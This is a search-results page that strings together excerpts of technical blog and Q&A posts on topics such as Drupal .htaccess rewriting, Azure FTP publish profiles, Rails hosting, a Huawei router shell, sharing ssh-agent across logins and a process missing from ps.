Search Results

Search found 3715 results on 149 pages for 'git rm'.


  • St. Louis ALT.NET

    - by Brian Schroer
    I’m a huge fan of the St. Louis .NET User Group and a regular attendee of their meetings, but always wished there was a local group that discussed more advanced .NET topics. (That’s not a criticism of the group - I appreciate that they want to server developers with a broad range of skill levels). That’s why I was thrilled when Nicholas Cloud started a St. Louis ALT.NET group in 2010. Here’s the “about us” statement from the group’s web site: The ALT.NET community is a loosely coupled, highly cohesive group of like-minded individuals who believe that the best developers do not align themselves with platforms and languages, but with principles and ideas. In 2007, David Laribee created the term "ALT.NET" to explain this "alternative" view of the Microsoft development universe--a view that challenged the "Microsoft-only" approach to software development. He distilled his thoughts into four key developer characteristics which form the basis of the ALT.NET philosophy: You're the type of developer who uses what works while keeping an eye out for a better way. You reach outside the mainstream to adopt the best of any community: Open Source, Agile, Java, Ruby, etc. You're not content with the status quo. Things can always be better expressed, more elegant and simple, more mutable, higher quality, etc. You know tools are great, but they only take you so far. It's the principles and knowledge that really matter. The best tools are those that embed the knowledge and encourage the principles (e.g. Resharper.) The St. Louis ALT.NET meetup group is a place where .NET developers can learn, share, and critique approaches to software development on the .NET stack. We cater to the highest common denominator, not the lowest, and want to help all St. Louis .NET developers achieve a superior level of software craftsmanship. I don’t see a lot of ALT.NET talk in blogs these days. The movement was harmed early on by the negative attitudes of some of its early leaders, including jerk moves like the Entity Framework “vote of no confidence”, but I do see occasional mentions of local groups like the St. Louis one. I think ALT.NET has been successful at bringing some of its ideas into the .NET world, including heavily influencing ASP.NET MVC and raising the general level of software craftsmanship for developers working on the Microsoft stack. The ideas and ideals live on, they’re just not branded as “this is ALT.NET!” In the past 18 months, St. Louis ALT.NET meetups have discussed topics like: NHibernate F# and other functional languages AOP CoffeeScript “How Ruby Is Making Me a Stronger C# Developer” Using rake for builds CQRS .NET dynamic programming micro web frameworks – Nancy & Jessica Git ALT.NET doesn’t mean (to me, anyway) “alternatives to .NET”, but “alternatives for .NET”. We look at how things are done in Ruby and other languages/platforms, but always with the idea “What can I learn from this to take back to my “day job” with .NET?”. Meetings are held at 7PM on the fourth Wednesday of each month at the offices of Professional Employment Group. PEG is located at 999 Executive Parkway (Suite 100 – lower level) in Creve Coeur (South of Olive off of Mason Road - Here's a map). Food is not supplied (sorry if you’re a big fan of the Papa John’s Crust-Lovers’ Pizza that’s a staple of user group meetings), but attendees are encouraged to come early and bring/share beer, so that’s cool. Thanks to Nick for organizing, and to Professional Employment Group for lending their offices. 
Please visit the meetup site for more information.

    Read the article

  • Url rewrite subfolder to root and forbid accessing subfolder

    - by Alessandro Pezzato
    I have drupal installed in a subfolder drupal, but I want to access pages as it is in root folder: http://www.example.com instead of http://www.example.com/drupal I'm able to have this working, but it's also working with url containing subfolder, so I have http://www.example.com and a clone site in http://www.example.com/drupal What is the rule to forbid access to subfolder? I want all url starting with http://www.example.com/drupal being forbidden. This is .htaccess in / directory: Options -Indexes Options +FollowSymLinks <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC] RewriteRule ^ http://%1%{REQUEST_URI} [L,R=301] RewriteRule ^(.*+)$ drupal/$1 [L,QSA] </IfModule> And this is drupal .htaccess in /drupal/ directory: Options -Indexes Options +FollowSymLinks ErrorDocument 404 index.php DirectoryIndex index.php index.html index.htm # Override PHP settings that cannot be changed at runtime. See # sites/default/default.settings.php and drupal_initialize_variables() in # includes/bootstrap.inc for settings that can be changed at runtime. # PHP 5, Apache 1 and 2. <IfModule mod_php5.c> php_flag magic_quotes_gpc off php_flag magic_quotes_sybase off php_flag register_globals off php_flag session.auto_start off php_value mbstring.http_input pass php_value mbstring.http_output pass php_flag mbstring.encoding_translation off </IfModule> # Requires mod_expires to be enabled. <IfModule mod_expires.c> # Enable expirations. ExpiresActive On # Cache all files for 2 weeks after access (A). ExpiresDefault A1209600 <FilesMatch \.php$> # Do not allow PHP scripts to be cached unless they explicitly send cache # headers themselves. Otherwise all scripts would have to overwrite the # headers set by mod_expires if they want another caching behavior. This may # fail if an error occurs early in the bootstrap process, and it may cause # problems if a non-Drupal PHP file is installed in a subdirectory. ExpiresActive Off </FilesMatch> </IfModule> # Various rewrite rules. <IfModule mod_rewrite.c> RewriteEngine on # Block access to "hidden" directories whose names begin with a period. This # includes directories used by version control systems such as Subversion or # Git to store control files. Files whose names begin with a period, as well # as the control files used by CVS, are protected by the FilesMatch directive # above. RewriteRule "(^|/)\." - [F] # To redirect all users to access the site WITH the 'www.' prefix, # (http://example.com/... will be redirected to http://www.example.com/...) # uncomment the following: # RewriteCond %{HTTP_HOST} !^www\. [NC] # RewriteRule ^ http://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301] # # To redirect all users to access the site WITHOUT the 'www.' prefix, # (http://www.example.com/... will be redirected to http://example.com/...) # uncomment the following: RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC] RewriteRule ^ http://%1%{REQUEST_URI} [L,R=301] RewriteBase /drupal # Pass all requests not referring directly to files in the filesystem to # index.php. Clean URLs are handled in drupal_environment_initialize(). RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !=/favicon.ico #RewriteRule ^ index.php [L] RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] # Rules to correctly serve gzip compressed CSS and JS files. # Requires both mod_rewrite and mod_headers to be enabled. <IfModule mod_headers.c> # Serve gzip compressed CSS files if they exist and the client accepts gzip. 
RewriteCond %{HTTP:Accept-encoding} gzip RewriteCond %{REQUEST_FILENAME}\.gz -s RewriteRule ^(.*)\.css $1\.css\.gz [QSA] # Serve gzip compressed JS files if they exist and the client accepts gzip. RewriteCond %{HTTP:Accept-encoding} gzip RewriteCond %{REQUEST_FILENAME}\.gz -s RewriteRule ^(.*)\.js $1\.js\.gz [QSA] # Serve correct content types, and prevent mod_deflate double gzip. RewriteRule \.css\.gz$ - [T=text/css,E=no-gzip:1] RewriteRule \.js\.gz$ - [T=text/javascript,E=no-gzip:1] <FilesMatch "(\.js\.gz|\.css\.gz)$"> # Serve correct encoding type. Header append Content-Encoding gzip # Force proxies to cache gzipped & non-gzipped css/js files separately. Header append Vary Accept-Encoding </FilesMatch> </IfModule> </IfModule>
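    For reference, the direction I'm currently trying (untested; it relies on %{THE_REQUEST} containing only the original client request line, never the internally rewritten URL) is to add a blocking rule to the root .htaccess just above the existing rewrite into drupal/:
      # refuse any request that explicitly asks for /drupal..., while still
      # allowing the internal rewrite from the root to reach the subfolder
      RewriteCond %{THE_REQUEST} \s/+drupal[/?\s] [NC]
      RewriteRule ^ - [F]
    With that in place, http://www.example.com/drupal/... should return 403 while http://www.example.com/... keeps being served from the subfolder.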

    Read the article

  • Welcome 2011

    - by PSteele
    About this time last year, I wrote a blog post about how January of 2010 was almost over and I hadn’t done a single blog post.  Ugh…  History repeats itself. 2010 in Review If I look back at 2010, it was a great year in terms of technology and development: Visited Redmond to attend the MVP Summit in February.  Had a great time with the MS product teams and got to connect with some really smart people. Continued my work on Visual Studio Magazine’s “C# Corner” column.  About mid-year, the column changed from an every-other-month print column to an every-other-month print column along with bi-monthly web-only articles.  Needless to say, this kept me even busier and away from my blog. Participated in another GiveCamp!  Thanks to the wonderful leadership of Michael Eaton and all of his minions, GiveCamp 2010 was another great success.  Planning for GiveCamp 2011 will be starting soon… I switched to DVCS full time.  After years of being a loyal SVN user, I got bit by the DVCS bug.  I played around with both Mercurial and Git and finally settled on Mercurial.  Its seamless integration with Windows Explorer along with its wealth of plugins made me fall in love.  I can’t imagine going back to using a centralized version control system. Continued to work with the awesome group of talent at SRT Solutions.  Very proud that SRT won its third consecutive FastTrack award! Jumped off the BlackBerry train and am enjoying the smooth ride of Android.  It was time to replace the old BlackBerry Storm, so I did some research and settled on the Motorola DroidX.  I couldn’t be happier.  Android is a slick OS and the DroidX is a sweet piece of hardware.  Been dabbling in some Android development with both Eclipse and IntelliJ IDEA (I like IntelliJ IDEA a lot better!).   2011 Plans On January 1st I was pleasantly surprised to get an email from the Microsoft MVP program letting me know that I had received the MVP award again for my community work in 2010.  I’m honored and humbled to be recognized by Microsoft as well as my peers! I’ll continue to do some Android development.  I’m currently working on a simple app to get my feet wet.  It may even make its way into the Android Market. I’ve got a project that could really benefit from WPF, so I’ll be diving into WPF this year.  I’ve played around with WPF a bit in the past – simple demos and learning exercises – but this will give me a chance to build an entire application in WPF.  I’m looking forward to the increased freedom that a WPF UI should give me. I plan on blogging a lot more in 2011! Technorati Tags: Android,MVP,Mercurial,WPF,SRT,GiveCamp

    Read the article

  • Managing Scripts in Oracle SQL Developer

    - by thatjeffsmith
    You backup your databases, right? You backup you home computer – your media collection, tax documents, bank accounts, etc, right? You backup your handy-dandy SQL scripts, right? Ok, now that I’ve got your head nodding, I want to answer a question I get every so often: How can I manage my scripts in SQL Developer? This is an interesting question. First, it assumes that one SHOULD manage their scripts in their IDE. Now, what I think the question generally gets around to is, how can we: Navigate to our scripts Open them Execute them What a good IDE should have is an interface to your existing Version Control System (VCS.) SQL Developer supports out-of-the-box both Subversion and Git. You can also download an extension via check-for-updates to get support for CVS. Now, what I’m about to show you COULD be done without versioning and controlling your scripts – but I want to ask you why you wouldn’t want to do this? So, I’m going to proceed and assume that you do INDEED version your scripts already. Seeing what scripts you’ve already got in your repository This is very straightforward – just open the Team Versions panel. Then connect to your repository. Shows you the files in your source control system. Now, I could ‘preview’ said file right away. If I open the file from here, we get a temp file copy down from the server to the local machine. This is a local temp copy of the controlled script – I can read/execute, but not write to it. And that might be all you need. But, if your script calls other scripts, then you’re going to want to check out the server copy of your stuff down your local SVN working copy directory. That way when your script calls another script – you’re executing the PRODUCTION APPROVED copies of said scripts. And if you do SPOOL or other file I/O stuff, it will work as expected. To get to those said client copies of your scripts… Enter the Files Panel The Files panel is accessible from the View menu. You can get to your files, one of two ways. If you’ve touched the file recently, you can see it under the Recent tree. Otherwise, you can navigate to your local ‘checked out’ copies of your script(s). Open your local copies, see what’s changed, etc. And I can access the change history and see what’s been touched… What changes am I going to ‘push out’ if I commit this back to the server? Most of us work on teams, yes? This panel also gives me a heads up if someone else is making changes to the same file. I can see the ‘incoming’ changes as well. To Sum It Up… If I want to get a script to run: do a full get to your local directory open the script(s) The files panel will tell you if your local copy is out of date from the server and if you have made local changes you’ve forgotten to commit back up to the server and your fellow teammates. Now, if you’re the selfish type and don’t want to share, that’s fine. But you should still be backing up your scripts, and you can still use the Files panel to manage your scripts.

    Read the article

  • ArchBeat Link-o-Rama Top 10 for September 9-15, 2012

    - by Bob Rhubart
    The Top 10 most-viewed items shared on the OTN ArchBeat Facebook page for the week of September 9-15, 2017. 15 Lessons from 15 Years as a Software Architect | Ingo Rammer In this presentation from the GOTO Conference in Copenhagen, Ingo Rammer shares 15 tips regarding people, complexity and technology that he learned doing software architecture for 15 years. Attend OTN Architect Day – by Architects, for Architects – October 25 You won't need 3D glasses to take in these live presentations (8 sessions, two tracks) on Cloud computing, SOA, and engineered systems. And the ticket price is: Zero. Nothing. Absolutely free. Register now for Oracle Technology Network Architect Day in Los Angeles. Thursday October 25, 2012, 8:00 a.m. – 5:00 p.m. Sofitel Los Angeles , 8555 Beverly Boulevard , Los Angeles, CA 90048. Cloud API and service designers, stop thinking small | Cloud Computing - InfoWorld "The focus must shift away from fine-grained APIs that provide some type of primitive service, such as pushing data to a block of storage or perhaps making a request to a cloud-rooted database," says InfoWorld's David Linthicum. "To go beyond primitives, you must understand how these services should be used in a much larger architectural context. In other words, you need to understand how businesses will employ these services to form real workplace solutions—inside and outside the enterprise." Adding a runtime picker to a taskflow parameter in WebCenter | Yannick Ongena Oracle ACE Yannick Ongena shows how to create an Oracle WebCenter popup to allow users to "select items or do more complex things." Oracle IAM 11g R2 docs are now available "One of the great things about the new doc set is the inclusion of ePub files," says Fusion Middleware A-Team blogger Chris Johnson. "This means that if you have an iPad you can load up the doc library onto that and read the docs on the couch." Setting up a local Yum Server using the Exalogic ZFS Storage Appliance | Donald A concise technical post from the man named Donald. What's New in Oracle VM VirtualBox 4.2? | The Fat Bloke Sings "One of the trends we've seen is that as the average host platform becomes more powerful, our users are consistently running more and more vm's," says The Fat Bloke. "Some of our users have large libraries of vm's of various vintages, whilst others have groups of vm's that are run together as an assembly of the various tiers in a multi-tiered software solution, for example, a database tier, middleware tier, and front-ends." The new VirtualBox release, a year in the making, addresses the needs of these users, he explains. Configuring Oracle Business Intelligence 11g MDS XML Source Control Management with Git Version Control | Christian Screen Oracle ACE Christian Screen developed this tutorial for those interested in learning how to configure the Oracle Business Intelligence 11g (11.1.1.6) metadata repository for development using the new MDS XML source control management functionality. Identity and Access Management at Oracle Open World 2012 | Brian Eidelman Fusion Middleware A-Team blogger Brian Eideleman highlights three Oracle Openworld sessions that will put Identity and Access Management in the spotlight, and shares a link to the "Focus On: Identity Management" document, a comprehensive listing of Openworld activities also dealing with IM. 
Starting and stopping WebLogic automatically using Upstart | Chris Johnson "In Ubuntu, RedHat and Oracle Linux there's a new flavor of init called Upstart that all the kids are using," says Oracle Fusion Middleware A-Team member Chris Johnson. "It's the new hotness when it comes to making programs into daemons and wiring them to start and stop at appropriate times." Thought for the Day "The purpose of software engineering is to control complexity, not to create it." — Pamela Zave Source: SoftwareQuotes.com

    Read the article

  • Free and Open Source Software in Oracle Solaris 11.1

    - by user13277799
    Oracle Solaris 11.1 contains number of Free and Open Source packages. The following table contains important FOSS packages with their versions available in this latest Oracle Solaris release. a2ps 4.14 aalib 1.4.0 pmtools 20071116 apache-ant 1.7.1 httpd 2.2.22 mod_dtrace 0.3.1 mod_fcgid 2.3.6 tomcat-connectors 1.2.28 mod_perl 2.0.4 mod_proxy_html 3.1.1 modsecurity-apache 2.5.9 mod_wsgi 3.3 apr 1.3.9 apr-util 1.3.9 areca 7.1 autoconf 2.68 autogen 5.9 automake 1.10 automake 1.11.2 automake 1.9.6 bash 4.1 bcc 0.16.17 beanshell 2.0b4 db 5.1.25 bind 9.6-ESV-R7-P2 binutils 2.21.1 bison 2.3 bzip2 1.0.6 cdrtools 3.00 clisp 2.47 cmake 2.8.6 gnu 0.5.11 conflict 20100627 convmv 1.15 coreutils 8.5 cups 1.4.5 curl 7.21.2 cvs 1.12.13 diffutils 2.8.7 doxygen 1.7.6.1 ejabberd 2.1.8 elinks 0.11.7 emacs 23.4 otp_src R12B-5 fcgi 2.4.0 fetchmail 6.3.22 flex 2.5.35 foomatic-db 20080903 foomatic-db-engine 3.0-20080903 foomatic-filters 4.0.15 foomatic-filters-ppds 20080818 fping 2.4b2_to gawk 3.1.8 gcc 3.4.3 gcc 4.5.2 gd 2.0.35 gdb 6.8 gdbm 1.8.3 gettext 0.16.1 grep 2.10 ghostscript 9.00 git 1.7.9.2 gnu-gs-fonts-other 6.0 gnu-gs-fonts-std 6.0 gmp 4.3.2 gnupg 2.0.17 gnuplot 4.6.0 pth 2.0.7 gocr 0.48 gperf 3.0.3 gpgme 1.1.8 grails 1.0.3 graphviz 2.28.0 tar 1.26 guile 1.8.6 gutenprint 5.2.7 gzip 1.4 hal-cups-utils 0.6.19 hexedit 1.2.12 hplip 3.10.9 httping 1.4.4 hwdata 0.5.11 iftop 0.17 ilmbase 1.0.1 ImageMagick 6.3.4 iperf 2.0.4 ipmitool 1.8.11 ircii 20060725 dhcp 4.1-ESV-R7 junit 4.10 INIT 2011-02-08 lcms 1.19 less 436 lftp 4.3.1 libassuan 2.0.1 confuse 2.6 libedit 20110802-3.0 libee 0.3.2 libestr 0.1.2 libevent 1.4.14b expat 2.1.0 libidn 1.19 libksba 1.1.0 libmcrypt 2.5.8 libmemcached 0.16 libmng 1.0.10 neon 0.29.5 libnet 1.1.5 libpcap 1.1.1 librsync 0.9.7 libsigsegv 2.6 libsndfile 1.0.23 libtecla 1.6.1 libtool 2.4.2 libtorrent 0.12.2 libusbugen 0.1.8 libusb 0.1.8 libxml2 2.7.6 libxslt 1.1.26 lighttpd 1.4.23 links 1.03 logilab-astng 0.19.0 logilab-common 0.40.0 lua 5.1.4 m4 1.4.12 make 3.82 mc 4.7.5.2 meld 1.4.0 memcached 1.4.5 memcached-java 2.0.1 mercurial 2.2.1 mpc 0.9 mpfr 2.4.2 mutt 1.5.21 mysql 5.1.37 ncftp 3.2.3 net-snmp 5.4.1 nethack 3.4.3 nmap 5.51 ntp-dev 4.2.5 open-fabrics 1.5.3 openexr 1.6.1 openldap 2.4.30 openscap 0.8.1 openssl 0.9.8q openssl 1.0.0j libopenusb 1.0.1 p7zip 9.20.1 pam_pkcs11 0.6.0 patch 2.5.9 pconsole 1.0 pcre 8.21 perl 5.12.4 DBI 1.58 Net-SSLeay 1.36 pmtools 1.10 XML-Parser 2.36 XML-Simple 2.18 PHP 5.2.17 PHP 5.3.14 pinentry 0.7.6 privoxy 3.0.17 proftpd 1.3.3 psutils p17 pv 1.2.0 pwgen 2.06 pylint 0.18.0 CherryPy 3.1.2 coverage 3.5 jsonrpclib 0.1.3 ldtp 2.1.1 M2Crypto 0.21.1 Mako 0.4.1 nose 1.1.2 ply 3.1 pybonjour 1.1.1 pycups 1.9.46 pycurl 7.19.0 lxml 2.3.3 pyOpenSSL 0.11 Python 2.6.8 Python 2.7.3 setuptools 0.6 quagga 0.99.19 quilt 0.60 rdiff-backup 1.3.3 readline 5.2 rpm2cpio 0.5.11 rsync 3.0.8 rsyslog 6.2.0 rtorrent 0.8.2 ruby 1.8.7 samba 3.6.6 sane-backends 1.0.19 sane-frontends 1.0.14 screen 4.0.3 sed 4.2.1 sendmail 8.14.5 slang 2.2.4 slib 3b1 slrn 0.9.9 snort 2.8.4.1 sox 14.3.2 spawn-fcgi 1.6.3 squid 3.1.18 stdcxx 4.2.1 subversion 1.7.5 sudo 1.8.4.5 swig 1.3.35 expect 5.45 tcl 8.5.9 tk 8.5.9 tls 1.6 tcpdump 4.1.1 tcsh 6.17.00 texinfo 4.7 tidy 1.0.0 timezone apache-tomcat 6.0.35 top 3.8beta1 trousers 0.3.6 unixODBC 2.3.0 unrar 4.1.4 unzip 6.0 vim 7.3 visual-panels wget 1.12 which 2.16 wireshark 1.8.2 wxGTK 2.8.12 xorriso 0.6.0 xz 5.0.1 zip 3.0 zlib 1.2.3 zsh 4.3.17

    Read the article

  • Azure Web Sites FTP credentials

    - by Bertrand Le Roy
    A quick tip for all you new enthusiastic users of the amazing new Azure. I struggled for a few minutes finding this, so I thought I’d share. The Azure dashboard doesn’t seem to give easy access to your FTP credentials, and they are not the login and password you use everywhere else. What Azure does give you, though, is a Publish Profile that you can download. This is a plain XML file that should look something like this:
      <publishData>
        <publishProfile profileName="nameofyoursite - Web Deploy" publishMethod="MSDeploy"
            publishUrl="waws-prod-blu-001.publish.azurewebsites.windows.net:443" msdeploySite="nameofyoursite"
            userName="$NameOfYourSite" userPWD="sOmeCrYPTicL00kIngStr1nG"
            destinationAppUrl="http://nameofyoursite.azurewebsites.net" SQLServerDBConnectionString=""
            mySQLDBConnectionString="" hostingProviderForumLink="" controlPanelLink="http://windows.azure.com">
          <databases/>
        </publishProfile>
        <publishProfile profileName="nameofyoursite - FTP" publishMethod="FTP"
            publishUrl="ftp://waws-prod-blu-001.ftp.azurewebsites.windows.net/site/wwwroot" ftpPassiveMode="True"
            userName="nameofyoursite\$nameofyoursite" userPWD="sOmeCrYPTicL00kIngStr1nG"
            destinationAppUrl="http://nameofyoursite.azurewebsites.net" SQLServerDBConnectionString=""
            mySQLDBConnectionString="" hostingProviderForumLink="" controlPanelLink="http://windows.azure.com">
          <databases/>
        </publishProfile>
      </publishData>
    The FTP server name, user name and password are the publishUrl, userName and userPWD values in the FTP profile. This is what you need to use in FileZilla or whatever you use to access your site remotely. Notice how the password looks encrypted. Well, it’s not really encrypted in fact. This is your password in clear text. It’s just crypto-random gibberish, which is the best kind of password. UPDATE: About 2 minutes after I posted that, David Ebbo mentioned to me on Twitter that if you've configured publishing credentials (for Git typically) those will work too. Don't forget to include the full user name though, which should be of the form nameofthesite\username. The password is the one you defined. That’s it. Enjoy.
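    If you want to pull those three FTP values out of the downloaded profile without opening it by hand, here is a rough shell sketch (the file name mysite.PublishSettings is an assumption; use whatever name the portal gave your download):
      # print publishUrl, userName and userPWD from the FTP publish profile
      grep -o 'publishMethod="FTP"[^>]*' mysite.PublishSettings | tr ' ' '\n' | grep -E '^(publishUrl|userName|userPWD)='
    This only works because none of those attribute values contain spaces; for anything more involved, a real XML parser is the safer choice.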

    Read the article

  • Can someone explain the true landscape of Rails vs PHP deployment, particularly within the context of Reseller-based web hosting (e.g., Hostgator)?

    - by rcd
    Currently, I have a reseller account with the company HostGator. I design websites, which up until now have occasionally been wrapped in Wordpress CMSs and the like (PHP applications). I then sell hosting (of the site I've designed) to the client, which is pretty simple, in that I can simply click a button and add a new shared hosting account/site with whatever settings I want. Furthermore, I then utilize WHMCS to automate billing and account management. It's a nice package and pretty simple. I pay something like $25 a month, and can sell a hundred accounts under this (because my clients bandwidth requirements are low). Now I am finding the need to develop more customized applications, including a minimalist CMS and several proprietary things. I soon anticipate developing these apps for clients as well. Thus, I've spent the past few months learning Rails, and it's coming along well now. The thing that has nagged at me all along, though, is the deployment issue. I can't wrap my brain around it. It seems like all of the popular options (Heroku, etc) have nice automation with git and are set up in the "Rails Way". I get that (sort of). But it's terribly expensive... a single dyno, a helper, and the cheapest database (which they say is mainly suitable for testing) that isn't limited to 5MB runs $51. This is for ONE app!!! Throw in a "production" DB and you're over $200. This is like... the same prices as getting a server somewhere, right? Meanwhile, going back to what I guess is a "traditional" hosting environment with Hostgator, their server only has Ruby 1.8.7 and Rails 2.3.5... No Rails 3. AND, no Passenger (not that I really understand the difference in CGI or mod_rails or whatever, but they say Passenger is the simplest). So I'm to understand that if I build an app in Rails 3, it won't run at all on this host? But damn, I already have these accounts under my reseller account there, all running static html and/or PHP stuff, right? So what now? How do I get all of this under one simple (and affordable) roof? Forgive my ignorance, but I just don't get it. Managing a VPS is cool and all, but entails learning server admin stuff and security... And it's expensive. I get that a shared and/or reseller "server-based" (forgive the terminology) may be inadequate for large-scale apps that use a lot of bandwidth... But what about for those of us who are building real (but small and low bandwidth) apps (with Rails) and who want to deploy them simply, cheaply, using the same conceptual approach as PHP? Even after learning all of this Ruby and Rails stuff for months, I'm questioning whether it's worth it when it comes to deployment. I want to build a small app, upload it to my home directory on a shared server account, and just make it run. Why should that be so hard? Am I just choosing the wrong language/framework? Forgive my ignorance in the subject; these questions are not rhetorical; just trying to learn here. So: 1) I'd appreciate if someone could give me a good rundown of how to understand deployment in Rails vs. PHP. 2) I'd appreciate if someone could address my issue with running a hosting/web business around reseller hosting (Hostgator) while also being able to host Rails apps. Can it be done? And how can a company like Hostgator completely ignore what's current in Rails/Ruby? Thanks.

    Read the article

  • Huawei b153 limit of devices

    - by bdecaf
    I set up my home network all through this 3G wifi router. Problem is it only allows 5 devices to connect. That's not much especially if a wifi printer and gaming consoles keep hogging these slots. On the other hand I don't see the point on blocking these devices. They are (should) not doing anything online just intern in my network. The documentation I can find is surpirisingly unhelpful and focuses how to plug the device in a power socket. So what would be my options. Notes: I have already been able to get a shell on the device using ssh. It's running some Busybox. But I fail to find the how and where this limit is enforced/created. Notes 2: Specifically my device is a 3WebCube - unfortunately not specifically marked with the Huawei Model number. Successes so far After enabling ssh in the options I can login: ssh -T [email protected] [email protected]'s password: ------------------------------- -----Welcome to ATP Cli------ ------------------------------- unfortunately because of this -T - the tab key does not work for autocomplete and all inputted commands will be echoed. Also no history with arrow keys. ATP interface this custom interface is not very useful: ATP>help help Welcome to ATP command line tool. If any question, please input "?" at the end of command. ATP>? ? cls debug help save ? exit ATP>save? save? Command failed. ATP>save ? save ? ATP>debug ? debug ? display set trace ? Shell BUT undocumented - I somehow found on a auto translated chinese website - all you need to do is input sh ATP>sh sh BusyBox vv1.9.1 (2011-03-27 11:59:11 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # builtin commands # help Built-in commands: ------------------- . : alias bg break cd chdir command continue eval exec exit export false fg getopts hash help jobs kill let local pwd read readonly return set shift source times trap true type ulimit umask unalias unset wait shows standard unix structure: # ls / var tmp proc linuxrc init etc bin usr sbin mnt lib html dev in /bin # ls /bin zebra strace ppps ln echo cat wscd startbsp pppc klog ebtables busybox wlancmd sshd ping kill dns brctl web sntp netstat iwpriv dhcps auth usbdiagd sms mount iwcontrol dhcpc atserver upnp sleep mknod iptables date atcmd upg siproxd mkdir ipcheck cp at umount sh mini_upnpd ip console ash test_at rm mic igmpproxy cms telnetd ripd ls ethcmd cmgr swapdev ps log equipcmd cli in /sbin # ls /sbin vconfig reboot insmod ifconfig arp route poweroff init halt using tftp after installing tftp on my desktop I was able to send files with tftp -s -l curcfg.xml 192.168.1.103 and to download onto the huawei with tftp -g -r curcfg.xml 192.168.1.103 I think I'll need that - because I don't see any editor installed. readout stuff (still playing around where I would get interesting info) For confirmation of hardware: # cat /var/log/modem_hardware_name ^HWVER:"WL1B153M001"# # cat /var/log/modem_software_name 1096.11.03.02.107 # cat /var/log/product_name B153

    Read the article

  • Sharing the same `ssh-agent` among multiple login sessions

    - by intuited
    Is there a convenient way to ensure that all logins from a given user (ie me) use the same ssh-agent? I hacked out a script to make this work most of the time, but I suspected all along that there was some way to do it that I had just missed. Additionally, since that time there have been amazing advances in computing technology, like for example this website. So the goal here is that whenever I log in to the box, regardless of whether it's via SSH, or in a graphical session started from gdm/kdm/etc, or at a console: if my username does not currently have an ssh-agent running, one is started, the environment variables exported, and ssh-add called. otherwise, the existing agent's coordinates are exported in the login session's environment variables. This facility is especially valuable when the box in question is used as a relay point when sshing into a third box. In this case it avoids having to type in the private key's passphrase every time you ssh in and then want to, for example, do git push or something. The script given below does this mostly reliably, although it botched recently when X crashed and I then started another graphical session. There might have been other screwiness going on in that instance. Here's my bad-is-good script. I source this from my .bashrc. # ssh-agent-procure.bash # v0.6.4 # ensures that all shells sourcing this file in profile/rc scripts use the same ssh-agent. # copyright me, now; licensed under the DWTFYWT license. mkdir -p "$HOME/etc/ssh"; function ssh-procure-launch-agent { eval `ssh-agent -s -a ~/etc/ssh/ssh-agent-socket`; ssh-add; } if [ ! $SSH_AGENT_PID ]; then if [ -e ~/etc/ssh/ssh-agent-socket ] ; then SSH_AGENT_PID=`ps -fC ssh-agent |grep 'etc/ssh/ssh-agent-socket' |sed -r 's/^\S+\s+(\S+).*$/\1/'`; if [[ $SSH_AGENT_PID =~ [0-9]+ ]]; then # in this case the agent has already been launched and we are just attaching to it. ##++ It should check that this pid is actually active & belongs to an ssh instance export SSH_AGENT_PID; SSH_AUTH_SOCK=~/etc/ssh/ssh-agent-socket; export SSH_AUTH_SOCK; else # in this case there is no agent running, so the socket file is left over from a graceless agent termination. rm ~/etc/ssh/ssh-agent-socket; ssh-procure-launch-agent; fi; else ssh-procure-launch-agent; fi; fi; Please tell me there's a better way to do this. Also please don't nitpick the inconsistencies/gaffes ( eg putting var stuff in etc ); I wrote this a while ago and have since learned many things.
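    For comparison, a shorter pattern that avoids grepping ps entirely: keep the socket path fixed and let ssh-add's exit status decide whether a live agent is behind it (exit status 2 means no agent could be contacted). This is only a sketch under the same layout assumption as the script above (socket kept under ~/etc/ssh):
      # candidate replacement for the pid-file/ps bookkeeping above
      export SSH_AUTH_SOCK="$HOME/etc/ssh/ssh-agent-socket"
      ssh-add -l >/dev/null 2>&1
      if [ $? -eq 2 ]; then                        # 2 = could not reach an agent on that socket
          rm -f "$SSH_AUTH_SOCK"                   # clear a stale socket left by a dead agent
          eval "$(ssh-agent -s -a "$SSH_AUTH_SOCK")" >/dev/null
          ssh-add
      fi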

    Read the article

  • Process not Listed by PS or in /proc/

    - by Hammer Bro.
    I'm trying to figure out how to operate a rather large Java program, 'prog'. If I go to its /bin/ dir and configure its setenv.sh and prog.sh to use local directories and my current user account. Then I try to run it via "./prog.sh start". Here are all the relevant bits of prog.sh: USER=(my current account) _CMD="/opt/jdk/bin/java -server -Xmx768m -classpath "${CLASSPATH}" -jar "${DIR}/prog.jar"" case "${ACTION}" in start) nohup su ${USER} -c "exec ${_CMD} >>${_LOGFILE} 2>&1" >/dev/null & echo $! >${_PID} echo "Prog running. PID="`cat ${_PID}` ;; stop) PID=`cat ${_PID} 2>/dev/null` echo "Shutting down prog: ${PID} kill -QUIT ${PID} 2>/dev/null kill ${PID} 2>/dev/null kill -KILL ${PID} 2>/dev/null rm -f ${_PID} echo "STOPPED `date`" >>${_LOGFILE} ;; When I actually do ./prog.sh start, it starts. But I can't find it at all on the process list. Nor can I kill it manually, using the same command the shell script uses. But I can tell it's running, because if I do ./prog.sh stop, it stops (and some temporary files elsewhere clean themselves out). ./prog.sh start Prog running. PID=1234 ps eaux | grep 1234 ps eaux | grep -i prog.jar ps eaux >> pslist.txt (It's not there either by PID or any clear name I can find: prog, java or jar.) cd /proc/1234/ -bash: cd: /proc/1234/: No such file or directory kill -QUIT 1234 kill 1234 kill -KILL 1234 -bash: kill: (1234) - No such process ./prog.sh stop Shutting down prog: 1234 As far as I can tell, the process is running yet not in any way listed by the system. I can't find it in ps or /proc/, nor can I kill it. But the shell script can still stop it properly. So my question is, how can something like this happen? Is the process supremely hidden, actually unlisted, or am I just missing it in some fashion? I'm trying to figure out what makes this program tick, and I can barely prove that it's ticking! Edit: ps eu | grep prog.sh (after having restarted; so random PID) 50038 19381 0.0 0.0 4412 632 pts/3 S+ 16:09 0:00 grep prog.sh HOSTNAME=machine.server.com TERM=vt100 SHELL=/bin/bash HISTSIZE=1000 SSH_CLIENT=::[STUFF] 1754 22 CVSROOT=:[DIR] SSH_TTY=/dev/pts/3 ANT_HOME=/opt/apache-ant-1.7.1 USER=[USER] LS_COLORS=[COLORS] SSH_AUTH_SOCK=[DIR] KDEDIR=/usr 